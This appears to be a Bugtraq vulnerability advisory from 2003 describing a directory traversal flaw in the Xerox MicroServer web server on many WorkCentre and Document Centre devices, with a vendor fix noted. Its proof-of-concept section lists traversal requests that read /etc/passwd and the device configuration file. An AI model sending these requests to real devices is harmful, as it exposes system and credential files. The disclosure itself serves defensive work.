Xerox MicroServer Web Server Remote Directory Traversal Vulnerability
BID:9256
Info
Xerox MicroServer Web Server Remote Directory Traversal Vulnerability
| Bugtraq ID: | 9256 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 19 2003 12:00AM |
| Updated: | Dec 19 2003 12:00AM |
| Credit: | The disclosure of this issue has been credited to J.A. Gutierrez <[email protected]>. |
| Vulnerable: |
Xerox WorkCentre Pro 90 Xerox WorkCentre Pro 75 Xerox WorkCentre Pro 65 Xerox WorkCentre Pro 55 Xerox WorkCentre Pro 45 Xerox WorkCentre Pro 40 Color Xerox WorkCentre Pro 35 Xerox WorkCentre Pro 32 Color Xerox WorkCentre M55 Xerox WorkCentre M45 Xerox WorkCentre M35 Xerox Document Centre 555 Xerox Document Centre 545 Xerox Document Centre 535 Xerox Document Centre 490 ST Xerox Document Centre 480 ST Xerox Document Centre 470 ST Xerox Document Centre 460 ST Xerox Document Centre 440 ST Xerox Document Centre 432 ST Xerox Document Centre 425 ST Xerox Document Centre 420 ST Xerox Document Centre 340 ST Xerox Document Centre 332 ST Xerox Document Centre 265 ST Xerox Document Centre 255 ST Xerox Document Centre 240 ST Xerox Document Centre 230 ST Xerox Document Centre 220 ST |
| Not Vulnerable: | |
Discussion
Xerox MicroServer Web Server Remote Directory Traversal Vulnerability
It has been reported that Xerox_MicroServer/Xerox11 may be prone to a directory traversal vulnerability that may allow an attacker to traverse outside the server root directory by using '/..' or '/.' character sequences at the end of a URL request.
It has been reported that Xerox_MicroServer/Xerox11 may be prone to a directory traversal vulnerability that may allow an attacker to traverse outside the server root directory by using '/..' or '/.' character sequences at the end of a URL request.
Exploit / POC
Xerox MicroServer Web Server Remote Directory Traversal Vulnerability
The following proof of concept has been provided:
GET /assist/..
GET /assist/////.././../../.
http://www.example.com////../../data/config/microsrv.cfg
http://www.example.com////////../../../../../../etc/passwd
The following proof of concept has been provided:
GET /assist/..
GET /assist/////.././../../.
http://www.example.com////../../data/config/microsrv.cfg
http://www.example.com////////../../../../../../etc/passwd
Solution / Fix
Xerox MicroServer Web Server Remote Directory Traversal Vulnerability
Solution:
Xerox has made fixes available for the affected products. Users should contact the vendor to obtain fixes for their specific products. See the References section for details.
Solution:
Xerox has made fixes available for the affected products. Users should contact the vendor to obtain fixes for their specific products. See the References section for details.
References
Xerox MicroServer Web Server Remote Directory Traversal Vulnerability
References:
References:
- Security Bulletin XRX03-001 (Xerox)
- Re: Security bug in Xerox Document Centre (K.Schleede
) - Security bug in Xerox Document Centre ("J.A. Gutierrez"
)